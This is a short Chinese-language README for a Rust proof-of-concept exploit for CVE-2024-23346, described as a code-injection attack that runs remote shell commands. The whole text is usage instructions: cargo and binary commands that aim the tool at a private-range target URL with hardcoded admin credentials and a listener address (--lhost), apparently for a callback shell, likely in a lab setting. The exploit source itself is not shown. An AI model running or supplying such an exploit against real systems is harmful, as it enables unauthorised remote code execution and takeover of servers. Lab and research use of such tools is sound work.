针对 CVE-2024-23346 的 Rust 漏洞利用脚本。
如下所示,该 POC 利用代码注入漏洞,并像在终端中一样运行远程 shell 命令。
运行漏洞利用的步骤:
Cargo 运行
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19或者
cargo build -r(二进制文件将在 target/release/poc 中)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19漏洞利用脚本灵感来源于 Python 脚本专家 MAWK0235